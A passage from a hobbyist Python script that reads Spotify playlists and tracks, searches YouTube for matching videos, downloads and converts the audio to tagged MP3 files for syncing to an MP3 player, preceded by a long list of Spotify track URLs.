'https://open.spotify.com/track/6rIThCnWLgi48NqcFLCedp?si=UxOG9pUTRJu3GAuGlpXIFA&context=spotify%3Aplaylist%3A37i9dQZF1DX1HoONJoJCjL',
'https://open.spotify.com/track/3dJXvBddoH1AGLpKvmbYDA?si=JMzstR5BQUWwuYeKozpKvg',
'https://open.spotify.com/track/6V97NdhQVsU4SwkUucepS3?si=LNd75NaXT3i2_G7AiyZrnA',
'https://open.spotify.com/track/6eHkModpBlDnq8vsJ6Ndag?si=ebJx6RpdSsuw7mKv1c2X2g',
'https://open.spotify.com/track/4TNm9fA5OIE8SDCBzX79it?si=ioOxlYTASxazWbXynQ0OYQ',
'https://open.spotify.com/track/6simvKne22uVh5ryufUF8U?si=FiBVMxJ2SYqTv5Vkkg0Uig',
'https://open.spotify.com/track/4fbvXwMTXPWaFyaMWUm9CR?si=vX5X8yFJQBii3K4Uj4eD9Q',
'https://open.spotify.com/track/29idXL5KF3RhwAR6XIxt1y?si=rDiMXVOfTh2Oa5VJaG6wfg',
'https://open.spotify.com/track/2S1LebN6AXXQqJolBxlWgO?si=iMGdGRsgQLedOH9y1t7y4g',
'https://open.spotify.com/track/5XZK1CC3LybEKGdmH04YBC?si=pLpADoxgSKqqOYZw54Z6xQ',
'https://open.spotify.com/track/11VwZwNF29HrqwalYUMitb?si=kr1Oyf6wR_2KuMRbXzwRxw',
'https://open.spotify.com/track/6cA3HSqfxfGCYs3kmB5TrS?si=JAhMT5ZqSzyEZQ1cCqa4lA',
'https://open.spotify.com/track/52Fw0bPlDegUpoETTxtIgf?si=ulm6JJMVQ-yjLV5UBzwl5A',
'https://open.spotify.com/track/4cjRiT6COzETZ3mWQXydnr?si=eE5UjmknQvubiGkXG-JfDw',
'https://open.spotify.com/track/5ZESanTyKmIOXBu7se7z6U?si=8bs-X-UXQIOfDQCl8FI1fg',
'https://open.spotify.com/track/14qPNe9WNrBJFeweWlkUgU?si=mU-J9Da9QH-uG8lB1iY0Iw',
'https://open.spotify.com/track/3U52igpu9mo4TGZdmRbZOy?si=Ef4y1ekJRNqHwIWaLscYuw',
'https://open.spotify.com/track/1cl1Wckhfp6MtydmHjVOyd?si=98GLQU7nS_uqRSGcYPbD8g',
'https://open.spotify.com/track/3BOtIwkhaJpTB9meCGEXUG?si=ImTcRBQ_SNmPo3u3J63VGw',
'https://open.spotify.com/track/4CeBKWWLXMrQMFsP0Q0K3V?si=hdg05wAKRiKcZolZC_QKIQ',
'https://open.spotify.com/track/6N5TNlYhmpuynRBlyXScV4?si=SzdJRmHES5SMXeiNEOXlfA&utm_source=whatsapp',
'https://open.spotify.com/track/4VCKj1eGRZ0snkb5WLgLsX?si=DgGC_PLWR-aXbJ92zf28gg',
'https://open.spotify.com/track/3DNRdudZ2SstnDCVKFdXxG?si=aYx9Egj-QEy0nwlPruKpQw',
'https://open.spotify.com/track/4lhUziuDKvQJu7ZW9cLmIv?si=JCFxSGWETJyNRtHoM7LYcw',
'https://open.spotify.com/track/4VCKj1eGRZ0snkb5WLgLsX?si=kVkd8pbuQaazS3Cfo7Nneg',
'https://open.spotify.com/track/7zXMexKnhAYV6biVbHwF0o?si=H87HHz1eRnK3vvyuAFBOqQ',
'https://open.spotify.com/track/6UqRGwjwYL0stXbaodTxwo?si=V7NxJhInT7iQtiZt9ys45A',
'https://open.spotify.com/track/76IijT19KtStPt9ij4nNk5?si=t61-_xglSGmrZ41JRvCXxQ&utm_source=whatsapp',
'https://open.spotify.com/track/5MXSLWGyPosYJ09LNu12SO?si=kxshC-9NQPyudEUtyxC_eg&utm_source=whatsapp',
'https://open.spotify.com/track/69Yia3qCLw6N9U80WhLwLn?si=xY35KQPgSqu4KZQDnibyvA',
'https://open.spotify.com/track/6ypqzijMjsopQkfMLrImQp?si=7B7lKfutSc67pvLA-QAq7w',
'https://open.spotify.com/track/3V80b6XYyAc2vD9s7tddxG?si=2HhI8wcaSGyXZsyahT6B6A',
'https://open.spotify.com/track/1MJ5f5EYBC92ADD6xcz7nb?si=l-agzBJ3R4iNyhnP0zXRSQ',
'https://open.spotify.com/track/438xBTovrKS6vp9mWqvtSE?si=HPS6hRDzSDmyM9LD4yH9jg',
'https://open.spotify.com/track/53XM8O6sQ4YzCq2jYgXuC6?si=ccGjqzMuQG62k9c_5vKFiQ',
'https://open.spotify.com/track/6Ln89sczgIcAJXGAIdS94R?si=e6rhhKl5RXaxcXuE7JAtlQ',
'https://open.spotify.com/track/2bb6xgxu1sevom4tn6OBSq?si=5ejErCGQSpq2qjvjbjgd4g',
'https://open.spotify.com/track/0D9yiSJ2f93D44a2Wk9yXS?si=V8-up-7TTR6rw2Cch_5pKQ',
'https://open.spotify.com/track/79hEgvfXVNbYT2AjaJ7ake?si=2-khUDx3Sci46pJKDLC9_Q',
'https://open.spotify.com/track/5hlMwqtOhJVwX0ih39qwSf?si=N1vuINhzRHizef0Oix-Zug',
'https://open.spotify.com/track/10glJ8ARN1G9ESFF9s00yk?si=UNvSFmlJQRW8tSNn8m46rg',
'https://open.spotify.com/track/0YXCJlidjXsr7vnu7EXZtH?si=VkpJ3PAvQW64cEbamxk42w',
'https://open.spotify.com/track/7vuwfilgaYreKxeyzQZTJf?si=R90DYV9FQ96DXF_7ZaVBqg',
'https://open.spotify.com/track/0DMzkDvrWz7GaTNf3257uZ?si=uVCKoQAaSueHoRH18r-k_w',
'https://open.spotify.com/track/2Atzk0W2RHeZw2oIiaBubK?si=5udwd4_JTQu-ckVDOHTBtQ',
'https://open.spotify.com/track/5MZ3ZUvMFbS0zKis6DwmAM?si=6bytyWejTbaKH3LkqrGH6w',
'https://open.spotify.com/track/4ose2wGsEKEajs2TGpe1eD?si=5Oy3XNgHSvaG3PyyrBV9lQ',
'https://open.spotify.com/track/37WBfdm7B3blOtJMxDyc5g?si=NhdeEUvCQBGWc5SGr0jfnA',
'https://open.spotify.com/track/5G3ZKjCHie2Ikr3I4QCQGt?si=6wXdbavMTmyh98RgB8woDg',
'https://open.spotify.com/track/1cxegHCKLxQrcxsBzXmWpB?si=tQUO4k8cSV6QBRlo9EX08w',
'https://open.spotify.com/track/0s8AZmbg5DnkjaYRCEWDpM?si=1cuCJI3OTt2CDwF1uhvXWQ',
'https://open.spotify.com/track/3knkVBvRx1k2au2ZnywrPt?si=R-CtIB5wR5OrgPM5LgoCrQ',
'https://open.spotify.com/track/4VCKj1eGRZ0snkb5WLgLsX?si=_WGzFuVZQGueqTbXlrt04w',
'https://open.spotify.com/track/3s7MCdXyWmwjdcWh7GWXas?si=Yc1s3nrSS1yu672-OfwB6Q',
'https://open.spotify.com/track/3Va1RWkIfhCEdo1MHVerfR?si=KSfxtr4sS1qZOTzrTtcrIQ',
'https://open.spotify.com/track/4oxOGrHTfkfFIlJVvlcfpq?si=hj8hCmZBR5SQyIq7Ax1c1Q',
'https://open.spotify.com/track/1bQJHs55iJ5DDPR1MjPQzG?si=csJbAoe1TcqA8-OdW-g2vw',
'https://open.spotify.com/track/5HpQ2SuB4EWkEvUhNYh75t?si=t2WpEeGaTJCQIjLfXjx_ww',
'https://open.spotify.com/track/4wiIuwsuopxoTRTu0GnuAN?si=5pb1ZSM8RiK307SG4VAwqw',
'https://open.spotify.com/track/3DICPaa3WhXrwqiooSWOSB?si=sfcZd-QgSYKQtbljIdLexQ',
'https://open.spotify.com/track/6iU1wS1dJh61wMBnoy55Mu?si=dDSlSHS6TI2faePKxqPPgQ',
'https://open.spotify.com/track/57DdS3F93lpn1h45nmXkGu?si=jP-Te6u9T0qV1xSAnXIHiA',
'https://open.spotify.com/track/5HCrm5tm2Lrvc18TFt4dCJ?si=HQMZaWKVT8Kk9U4ojpmJzw',
'https://open.spotify.com/track/7xPQY7skgsujvvVyoE5lBi?si=Q-YFYogbT3aUJzw-E5B8mw',
'https://open.spotify.com/track/7eOJ0Fe4dJdpFE5KiDNv7A?si=DNN5hSY_QMOwmFDbjQHIZQ',
'https://open.spotify.com/track/0fxGA5lxrdYNYoE7yJxTNZ?si=QmKU7cBrTjCNKYKqULxgDw',
'https://open.spotify.com/track/2XmEDW2SUbYYt5o2cxSEz4?si=qaaHAZALT3eJc5thSl9csA',
'https://open.spotify.com/track/0GyXfYRuvG9nt71zF99SER?si=m8tPCRuiRd-9Gs9gmZoj9A',
'https://open.spotify.com/track/1rv46mRwDqMEhOBZ7vODg3?si=glJW7CaxTFKufmWdnl0Rvg',
'https://open.spotify.com/track/11eWp7aUhs9RShuCrnglDc?si=QJhhbQiMT8GNcLdIkkcSgg',
'https://open.spotify.com/track/43DeSV93pJPT4lCZaWZ6b1?si=uVT0G3WUTNuvMzRw0nd_ag',
'https://open.spotify.com/track/0Psz3az3RIYfJpnsajBT8N?si=L7LAGmX1SHevalTLdMJMcg',
'https://open.spotify.com/track/4oKQPfmBkN7UPuQVvqS5Np?si=hcP84V3iQmSZCsRrnbpLmA',
'https://open.spotify.com/track/4TXVuIAvpDcrxw2DcOj3v3?si=rOfzm4fURZ6RBQnmn1v_Vw',
'https://open.spotify.com/track/2vAhq1zwhOBcNvYchGXvjc?si=J4S6lD5oToqleow5D5I8jg',
'https://open.spotify.com/track/02dPa4nXABwnFzjZosKxsk?si=4uKRr-_xQZ-QB2LJybH46A',
'https://open.spotify.com/track/6vKTm5I3Nqpw6CJt7NgHLz?si=XIUEafjhQvKyFZFEqD9-EQ',
'https://open.spotify.com/track/6Jfpv3vvfobay7uYVxWXog?si=aQZj0T1ZSM6qkzg0SnkS6g',
'https://open.spotify.com/track/36vmjzpqqcH4zryJPlyHwP?si=bthDbk9KTIycvcVY-HXaXQ',
'https://open.spotify.com/track/5bgOnX2KXKiC006R5hnHAJ?si=bM5Pc49dRP68YPcwkndTOw',
'https://open.spotify.com/track/0ZnwzjB40zdTZrEwPvaRqG?si=s0_sXrXuQyqCkjog9bLhuQ&context=spotify%3Auser%3Aspotify%3Aplaylist%3A37i9dQZF1DXd9vfK9DV3I6',
'https://open.spotify.com/track/6EiNPCNOmYBLJFy5kf68Va?si=bn-lGKjfTXetoPHdysEGaw&utm_source=whatsapp',
'https://open.spotify.com/track/7xlrdBdz8TGSo0COvLHymc?si=eMhQUP8vSN6YMTTggGRuaA',
'https://open.spotify.com/track/0IrPLnJlvxkOeO9PJSlIhr?si=5fVOjevFSyKhk1NBWDA9sw',
'https://open.spotify.com/track/40wUM3LFZOlUcZfxEIZrYK?si=xVCLhJJwTQGN5hqywFwdcA',
'https://open.spotify.com/track/4VvTumh88DI240WO9ej6OV?si=ZJ6SPqK6TFaYK7_Tw85qUg',
'https://open.spotify.com/track/6H4WlsYhmoHR32cjoBEx8P?si=PFfI71bnSHqm0eHYUTVPzA&utm_source=whatsapp',
'https://open.spotify.com/track/7dEYUkZMdUs7rfOKRMr5lO?si=nLaM1s7ESKGVwjHqGuSVKA',
'https://open.spotify.com/track/6FLwmdmW77N1Pxb1aWsZmO?si=eA-35u0KREmtJ42lxaRLfA',
'https://open.spotify.com/track/3m3TpmwZDF1UGC4v6Fwhfk?si=YOdclhiqRjqbszJyD1gjwA',
'https://open.spotify.com/track/7nda0GK3uUnKgngFzNuYhx?si=takK6wpORci8IbVpxIF_Eg',
'https://open.spotify.com/track/1Ot6UNRGj2aYS3xtqw1YtA?si=xbHwgtC2QsSbTZkqLNNyxw',
'https://open.spotify.com/track/6V0cqtIK4V5e1z4waoohDd?si=pUoVffWoTG62frKmVZJaHA&utm_source=whatsapp',
'https://open.spotify.com/track/49acDBy9eCghAkXVdqRusk?si=usTysmtWR0anjt7pE2VJOQ',
'https://open.spotify.com/track/6Jfpv3vvfobay7uYVxWXog?si=dJsxDANsRfuqJLscQS7liQ&utm_source=whatsapp',
'https://open.spotify.com/track/2WAHi5ZJwDZqGjnhZgZYmU?si=--RPKCpWSNiCsmZbcqPSBg',
'https://open.spotify.com/track/3bbqxT5UGZsvTy1r3txs0t?si=5LSySSENRUOCKN_KwKJI0w',
'https://open.spotify.com/track/0oN921mKYPOVYhKceZofrs?si=i2HPeV2HR9q4U3hfCoB_IQ',
'https://open.spotify.com/track/73oamquev2r1MMkSDEjKgQ?si=PRRvPjmoR42N_q5aTjUhdw',
'https://open.spotify.com/track/6oxemotUd24kJINSZgsEKS?si=efiS2a24QNKdM946YnQr_w&utm_source=whatsapp',
'https://open.spotify.com/track/5F3t5WgLyBX2W7un8IXiLD?si=hdIqDB2dR8CG3sX2_0TCbg&utm_source=whatsapp',
'https://open.spotify.com/track/4y8EK77j9dgfA4Ewig3Ad1?si=oe_WErJiTnS-uAaAourdXQ&utm_source=whatsapp yeah',
'https://open.spotify.com/track/3m3TpmwZDF1UGC4v6Fwhfk?si=Zdyr3ARySJaOoSXDsf9HvA&utm_source=whatsapp',
'https://open.spotify.com/track/3PDcJzbBq2rwBAwny82gJm?si=fy5M_wCCTVObvZAZ183cHw&utm_source=whatsapp',
'https://open.spotify.com/track/0YDPNHKTSC0agSj7BJRkLA?si=8xIr8-W_RGmlFkLKLrk5Aw&utm_source=whatsapp',
'https://open.spotify.com/track/6gb9RppaNsLof48ZTSYxhv?si=8paErTgWTY2A_qwCsfL5Mg&utm_source=whatsapp',
'https://open.spotify.com/episode/4gxFQqDsqndyW8SokYJPE6?si=U5e4i-VKRK6fY79eC4_APg',
'https://open.spotify.com/track/3Uwcyve5afWP54jgN0B5cy?si=u_OlIc2ORwqAidhp1P7Ozg&utm_source=whatsapp',
'https://open.spotify.com/track/0saGACKtFP1ZVW4Nd4IkCw?si=b6as1Yy0S0m-gGcdlfJ8hA',
'https://open.spotify.com/track/4qDHt2ClApBBzDAvhNGWFd?si=P4gY9AmiTAeY9Wf4Q4zR7w',
'https://open.spotify.com/track/62p6fF2r4NY6pwZbxxvmr8?si=6kNPIhS0R-yAgZyGgRHIYg&context=spotify%3Aplaylist%3A37i9dQZF1DX8pxtTvJ2V4V',
'https://open.spotify.com/track/2DCGf0V1FO3FR2TQXb7kAZ?si=grnqOMULQKS6M6K4ROFt5w&utm_source=whatsapp',
'https://open.spotify.com/track/58f4twRnbZOOVUhMUpplJ4?si=pcjeP-CWSKyZsB4K29Aobg&utm_source=whatsapp',
'https://open.spotify.com/track/1bVe7em86sIb8jW3SUZF0Z?si=lVe8HniPTVatSmyWUC-bfg&utm_source=whatsapp',
'https://open.spotify.com/track/62IihiyUNMZ52oSnX55Bi4?si=soPGDnDaT_CzfXTSUBfU2g&utm_source=whatsapp',
'https://open.spotify.com/track/3v3FEONiwvufayPNcWzHhc?si=eHP-anXKR46DmZ7LswwS0w&utm_source=whatsapp',
'https://open.spotify.com/track/67hbP9PFQZrb4XZc3TzB0s?si=UJVl8XePROel3tKVnfyXTQ&utm_source=whatsapp',
'https://open.spotify.com/track/4geScOJv4iQKceWrtXvASm?si=-T4bGPYDQly92qUagXCXKw',
'https://open.spotify.com/track/4sKeiBIJi5gENURIMC3pW5?si=959bUr2yRF6r6r_MwHUlRw',
'https://open.spotify.com/track/18V1UiYRvWYwn01CRDbbuR?si=hlNPnSLJS8S48ScqP3yRtA&utm_source=whatsapp',
'https://open.spotify.com/track/3RkQ3UwOyPqpIiIvGVewuU?si=YmbfmNkuR5utTj38nBgLIw',
'https://open.spotify.com/track/6QPhpvO1pWDS91EsEmzsbc?si=wtBt_tsfTDOTBtpiyzkbRg',
'https://open.spotify.com/track/1v2zyAJrChw5JnfafSkwkJ?si=4HNy1dGMQ6mt8LbyyND6Ug',
'https://open.spotify.com/track/1baHxgYktT8eDdmtTozJF9?si=STqZcMIlRjGVuC_NHGvc9Q',
'https://open.spotify.com/track/4cjRiT6COzETZ3mWQXydnr?si=0ZBizUtGTEG0HRM00syTWA',
'https://open.spotify.com/track/0hWzB4dR1zwcokPvccww0k?si=bN-3XoMJSv-zln_8EJ1MaA&utm_source=whatsapp',
'https://open.spotify.com/track/5ql2mP9FUhB3SgMzv2akuO?si=tz41WoQuSlufJ4Vk0VJ5Cw&utm_source=whatsapp',
'https://open.spotify.com/track/4jM545c2DEKT78TYRSSzIr?si=vdprffAmQrCAT_hHI5haLw&utm_source=whatsapp',
'https://open.spotify.com/track/6YLcnMrPDdNSgvkie3yZ2U?si=NnPL0wNVStWW4p8rv98heA&utm_source=whatsapp',
'https://open.spotify.com/track/6t1FIJlZWTQfIZhsGjaulM?si=u6UqKpJoRBa2FsQ4Lkd6Ow&utm_source=whatsapp',
'https://open.spotify.com/track/26ky3sBMKv31Kpvil5pGDh?si=MaLI0y6nTIKARTZX6nXByg&utm_source=whatsapp',
'https://open.spotify.com/track/1CRy08G60mS5jvhB27xMpS?si=Z7hVhPYzSvqe5XM5xSGsMg&utm_source=whatsapp',
'https://open.spotify.com/track/5DRGuHS0xJ3X3OZjCrglTI?si=nTDdCh6XQCKVrt13lkhbfQ',
'https://open.spotify.com/track/6KkyuDhrEhR5nJVKtv9mCf?si=xoRTQum3TUS6kqS-PORuhg&utm_source=whatsapp',
'https://open.spotify.com/track/1v1oIWf2Xgh54kIWuKsDf6?si=rsA4CXIgStm7R0LJvpifAQ&utm_source=whatsapp',
'https://open.spotify.com/track/3Jai674s9zQJJxsgsyRBHz?si=_EgT5kMbSaONFCZcJ6bGxQ&utm_source=whatsapp',
'https://open.spotify.com/track/4U45aEWtQhrm8A5mxPaFZ7?si=3LBAosNsSDOgFw3ZzGkiqA',
'https://open.spotify.com/track/2L7eiwosmluifpAVmrvVtm?si=0DU_fV_jRUiOTgkvuKe3FA',
'https://open.spotify.com/track/2zQ2vKm9VslwOerYEWHtaF?si=cd4Rx19xRqu1wosBhzOZzQ',
'https://open.spotify.com/track/3qsMWrhTbsiTQVykS3AeO5?si=93ZT-DifQkiR_NzaF15SdA',
'https://open.spotify.com/track/74Dn2KLL8i6sAJoQh6hIRJ?si=AB9c5T-8QMChc810iOGo8w',
'https://open.spotify.com/track/2bZNwQvu1GQn0DvytrSwUx?si=42xc7Pe9TIGyLtZnRG2zkA',
'https://open.spotify.com/track/6Yn08sgGjRB2TARWyFqb70?si=UTWJqywoTR2g2ZTzCrimUw',
'https://open.spotify.com/track/5CBG9UwXBAZqKg97xzOUVN?si=iFCHEA_9Tsu2FL6tCSSmEQ&utm_source=whatsapp',
'https://open.spotify.com/track/3Jai674s9zQJJxsgsyRBHz?si=9uPkuNtdTLmGypMJG-EuBw&utm_source=whatsapp',
'https://open.spotify.com/track/5HjBpej4uHPAX8sMeUFJms?si=klSnlFH6Sbu-4HMqpfbAZA&utm_source=whatsapp',
'https://open.spotify.com/track/1cjYtL6yMFDLyZYn9bDkGo?si=0fWsUrDKRAqJpp5X47_XJQ&utm_source=whatsapp',
'https://open.spotify.com/track/16qYlQ6koFxYVbiJbGHblz?si=Tp0LZMOcSC-ocitQQlJxng&utm_source=whatsapp',
'https://open.spotify.com/track/3umugAkzQbdcOamNhjyIl7?si=P487XulRR6WyX5slgRQUmQ&utm_source=whatsapp',
'https://open.spotify.com/track/4o7Rszx7VVCzrCr1RPlPot?si=YyqV_GFzTEqN70NNwI3_pg&utm_source=whatsapp',
'https://open.spotify.com/track/59c7vs87nANrDrphf0gDBi?si=N1qNXBhcTyKo5iQUQK8w6Q&utm_source=whatsapp',
'https://open.spotify.com/track/0PvFJmanyNQMseIFrU708S?si=ni4FHwNXRLquvvMdVUkVGA&utm_source=whatsapp',
'https://open.spotify.com/track/7N3AWpme64LhM1P8I6yIZx?si=3Q-MtPrMQ2SdIN1GxR6rtQ&utm_source=whatsapp',
'https://open.spotify.com/track/3PDcJzbBq2rwBAwny82gJm?si=Vmw-Z9S3SpWSFxC_TqIIKA&utm_source=whatsapp',
'https://open.spotify.com/track/3m3TpmwZDF1UGC4v6Fwhfk?si=UT4TDL7iQsGdGVvQf1wiOQ&utm_source=whatsapp',
],
]
}
}
parser = argparse.ArgumentParser(description="🎷 Sync your Spotify music with your MP3 player!")
parser.add_argument("-s", help="process playlist, download, and sync with target drive", action='store_true')
parser.add_argument("-ds", help="sync downloaded files with your target drive only", action='store_true')
# parser.add_argument("-r", help="loop the process after 2 hrs", action='store_true')
parser.add_argument("-v", help="get more output?", action='store_true')
parser.add_argument("-d", help="Developer use only, for debug", action='store_true')
args = parser.parse_args()
client_credentials_manager = SpotifyClientCredentials(configs['spotify']['client_id'],
configs['spotify']['client_secret'])
sp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
def p(print_string):
"""
Print stuff ?
:rtype: object
"""
print(print_string)
def search_youtube(text_to_search):
"""
Search the text on youtube and return its parsed results with title, channel name, desc and duration
:rtype: object
"""
query = urllib.parse.quote(text_to_search)
url = "https://www.youtube.com/results?search_query=" + query
try:
response = urllib.request.urlopen(url)
html = response.read()
html = str(html, 'utf-8')
except Exception as e:
p('😥 Youtube gave up, this is so sad, can we get 1 like ' + repr(e))
return []
# find and get video id from html string.
start_string = 'var ytInitialData = '
end_string = ']};</script><script nonce='
start_position = html.find(start_string)
start_position += len(start_string)
end_position = html.find(end_string)
# get the youtube object
object_string = html[start_position: end_position + 3]
# trim the end and remove the last ; semi colon
my_fav_object = object_string.strip()[0:-1]
fav_object = json.loads(my_fav_object)
list = \
fav_object['contents']['twoColumnSearchResultsRenderer']['primaryContents']['sectionListRenderer']['contents'][
0][
'itemSectionRenderer']['contents']
selected_video = False
video_list = []
for item in list:
if 'videoRenderer' in item:
videoId = item['videoRenderer']['videoId']
title = item['videoRenderer']['title']['runs'][0]['text']
time = item['videoRenderer']['lengthText']['simpleText']
description = ''
if 'descriptionSnippet' in item['videoRenderer']:
description = item['videoRenderer']['descriptionSnippet']['runs'][0]['text']
channel_name = item['videoRenderer']['ownerText']['runs'][0]['text']
seconds = give_me_seconds(time)
# selected_video = {
# 'video_id': videoId,
# 'title': title,
# 'time': this_video_seconds,
# 'description': description,
# 'channel_name': channel_name
# }
video_list.append({
'title': title,
'channel': channel_name,
'description': description,
'href': '',
'video_id': videoId,
'duration': time,
'duration_seconds': seconds
})
# page = BeautifulSoup(html, features='lxml')
# vid_list = page.find_all('div', attrs={'class': 'yt-lockup-content'})
#
# for vid in vid_list:
#
# title_link = vid.findChild('a', attrs={'class': 'yt-uix-tile-link'}, recursive=True)
# if title_link is None:
# continue
#
# title = title_link.attrs['title']
# href = title_link.attrs['href']
#
# duration_el = vid.findChild('span', attrs={'class': 'accessible-description'}, recursive=True)
# if duration_el is None:
# continue
#
# duration = duration_el.text
#
# channel_name = ''
# channel_name_el = vid.findChild('a', attrs={'class': 'yt-uix-sessionlink'}, recursive=True)
# if channel_name_el is None:
# channel_name = channel_name_el.text
#
# video_description_el = vid.findChild('div', attrs={'class': 'yt-lockup-description'}, recursive=True)
# video_description = ''
# if video_description_el is not None:
# video_description = video_description_el.text
#
# if duration.find('Duration') == -1:
# continue
#
# duration_parsed = duration[duration.find(':') + 2:-1]
# # not parsing hour long stuff right now: example: 1:01:49
# # if the target video is more than 1 hr, consider it has 1 hr.
# if len(duration_parsed) > 5:
# duration_parsed = '59:59'
#
# duration_in_seconds = int(duration_parsed[int(duration_parsed.find(':')) + 1:])
# duration_in_minutes = int(duration_parsed[:duration_parsed.find(':')])
# total_duration_in_seconds = duration_in_seconds + (duration_in_minutes * 60)
# video_id = href[href.find('?v=') + 3:]
# video_list.append({
# 'title': title,
# 'channel': channel_name,
# 'description': video_description,
# 'href': href,
# 'video_id': video_id,
# 'duration': duration_parsed,
# 'duration_seconds': total_duration_in_seconds
# })
return video_list
def give_me_seconds(time):
time_array = time.split(':')
time_array.reverse()
# time_array.
c = len(time_array) - 1
seconds = 0
while c >= 0:
sec = int(time_array[c])
c2 = c
while (c2):
sec *= 60
c2 -= 1
seconds += sec
c -= 1
return seconds
def download_video(video_id, file_name):
"""
Download the audio format 251, and store it in file_name
:rtype: object -> file name
"""
ydl_opts = {
'format': '251/best',
'outtmpl': './' + file_name + '.webm',
}
if configs['youtube_username'] is not None:
ydl_opts['username'] = configs['youtube_username']
if configs['youtube_password'] is not None:
ydl_opts['password'] = configs['youtube_password']
a = youtube_dl.YoutubeDL(ydl_opts)
v = a.download(['https://www.youtube.com/watch?v=' + video_id])
return './' + file_name + '.webm'
def convert_to_mp3(source, target):
"""
Convert the downloaded webm file to mp3
:rtype: object
"""
source = source.replace('/', '\\')
target = target.replace('/', '\\')
# fnull = open(os.devnull, 'w')
# subprocess.call('.\\ffmpeg\\bin\\ffmpeg.exe -threads 6 -i "' + source + '" -vn -ab 128k -ar 44100 -y "' + target + '"', shell=True, stdout=fnull, stderr=subprocess.STDOUT)
os.system(
'".\\ffmpeg\\bin\\ffmpeg.exe -hide_banner -i "' + source + '" -vn -ab 160k -ar 44100 -y "' + target + '""')
def tag_mp3(file_path, track):
"""
tag that mp3, insert artist, album, track names and album art.
:rtype: object
"""
f = eyed3.load(file_path)
if f.tag is None:
f.initTag()
if track['album_art'] is not None:
content = requests.get(track['album_art']).content
f.tag.images.set(3, content, 'image/jpeg')
f.tag.comments.set(track['search_term'] + ' = ' + track['selected_result'])
f.tag.artist = track['artist']
f.tag.album = track['album']
f.tag.album_artist = track['artist']
f.tag.title = track['name']
f.tag.track_num = track['number']
f.tag.save(None, (2, 3, 0))
def clean_string(filename):
"""
Clean the string, only keep alnum, spaces and -
:param filename:
:return:
"""
whitelist = set('abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-')
filename = ''.join(filter(whitelist.__contains__, filename))
filename = filename.lower().strip()
return filename
get_spotify_playlist_threads = 0
get_spotify_playlist = []
def get_spotify_playlist(spotify_playlist):
global get_spotify_playlist
global get_spotify_playlist_threads
get_spotify_playlist = []
for playlist_info in spotify_playlist:
def get_playlist(playlist_info2):
global get_spotify_playlist_threads
global get_spotify_playlist
if 'user' not in playlist_info2:
playlist_single_info = {
'name': 'songs',
'path': 'songs/',
'tracks': playlist_info2['song_ids'],
'playlist_id': False,
'type': 'spotify',
'user_id': False,
'user_name': False
}
else:
try:
info = sp.user_playlist(playlist_info2['user'], playlist_info2['playlist_id']);
except:
p("\n Failed to get playlist " + playlist_info2['playlist_id'])
os._exit(1)
owner_name = info['owner']['display_name']
p('Fetching playlist information for ✔ id:' + owner_name + ' playlist: ' + info['name'])
path = clean_string(owner_name[:6] + '-' + info['name'])
playlist_single_info = {
'name': info['name'],
'path': path + '/',
'tracks': [],
'playlist_id': info['id'],
'type': 'spotify',
'user_id': info['owner']['id'],
'user_name': info['owner']['display_name']
}
get_spotify_playlist.append(playlist_single_info)
get_spotify_playlist_threads -= 1
while get_spotify_playlist_threads > configs['concurrent_connections']:
time.sleep(.1)
get_playlist(playlist_info)
get_spotify_playlist_threads += 1
# t = threading.Thread(target=get_playlist, args=(playlist_info,))
# t.daemon = True
# t.start()
while get_spotify_playlist_threads != 0:
time.sleep(.1)
return get_spotify_playlist
def get_spotify_tracks_individualy(tracks2):
trackIds = []
trackGroups = []
tracks = {'tracks': []}
limit = 10
p('')
for t in tracks2:
parts = t.split('?')[0].split('/')
id = parts[len(parts) - 1]
trackIds.append(id)
if len(trackIds) == limit:
trackGroups.append(trackIds)
trackIds = []
p('Made ' + str(len(trackGroups)) + ' track groups from tracks')
for g in trackGroups:
p('getting tracks for group')
t3 = sp.tracks(g)['tracks']
tracks['tracks'] = tracks['tracks'] + t3
parsed_tracks = []
for t in tracks['tracks']:
if t is None or 'name' not in t:
continue
track_name = t['name']
artist_name = t['artists'][0]['name']
album_name = t['album']['name']
path = clean_string(artist_name + '-' + track_name)
def compose_term(term, lim):
composed_terms = []
index = 0
for t in term.split(' '):
if len(t) > 1:
if index <= lim:
composed_terms.append('"' + t + '"') # make strict search for first 5 words
index += 1
else:
composed_terms.append('' + t + '') # not so strict search for later words
return ' '.join(composed_terms)
composed_term = compose_term(clean_string(artist_name), 2) + ' ' + compose_term(clean_string(track_name), 4)
search_term = composed_term + ' ' + configs['song_selection']['append_search_term']
track = {
'name': track_name,
'search_term': search_term,
'artist': artist_name,
'album': album_name,
'path': path + '.mp3',
'number': t['track_number'],
'id': t['id'],
'duration': int(t['duration_ms']) / 1000,
'disc_number': str(t['disc_number']),
'artist_id': t['artists'][0]['id'],
'release_date': t['album']['release_date'],
}
images = t['album']['images']
if len(images) > 1:
image = t['album']['images'][1]['url']
elif len(images) == 1:
image = t['album']['images'][0]['url']
else:
image = None
track['album_art'] = image
parsed_tracks.append(track)
return parsed_tracks
# sp.tracks()
def get_spotify_tracks(user_id, playlist_id):
"""
tracks
:param user_id:
:param playlist_id:
:return:
"""
# @todo implement tracks gathering for more than 100 tracks, pagination pending
tracks = sp.user_playlist_tracks(user_id, playlist_id, None, 100, 0)
parsed_tracks = []
for t in tracks['items']:
track_name = t['track']['name']
artist_name = t['track']['artists'][0]['name']
album_name = t['track']['album']['name']
path = clean_string(artist_name + '-' + track_name)
def compose_term(term, lim):
composed_terms = []
index = 0
for t in term.split(' '):
if len(t) > 1:
if index <= lim:
composed_terms.append('"' + t + '"') # make strict search for first 5 words
index += 1
else:
composed_terms.append('' + t + '') # not so strict search for later words
return ' '.join(composed_terms)
composed_term = compose_term(clean_string(artist_name), 2) + ' ' + compose_term(clean_string(track_name), 4)
search_term = composed_term + ' ' + configs['song_selection']['append_search_term']
track = {
'name': track_name,
'search_term': search_term,
'artist': artist_name,
'album': album_name,
'path': path + '.mp3',
'number': t['track']['track_number'],
'id': t['track']['id'],
'duration': int(t['track']['duration_ms']) / 1000,
'disc_number': str(t['track']['disc_number']),
'artist_id': t['track']['artists'][0]['id'],
'release_date': t['track']['album']['release_date'],
}
images = t['track']['album']['images']
if len(images) > 1:
image = t['track']['album']['images'][1]['url']
elif len(images) == 1:
image = t['track']['album']['images'][0]['url']
else:
image = None
track['album_art'] = image
parsed_tracks.append(track)
return parsed_tracks
def parse_spotify_playlist_config():
playlist = configs['playlist']['spotify']
for pl in playlist:
if not isinstance(pl, str):
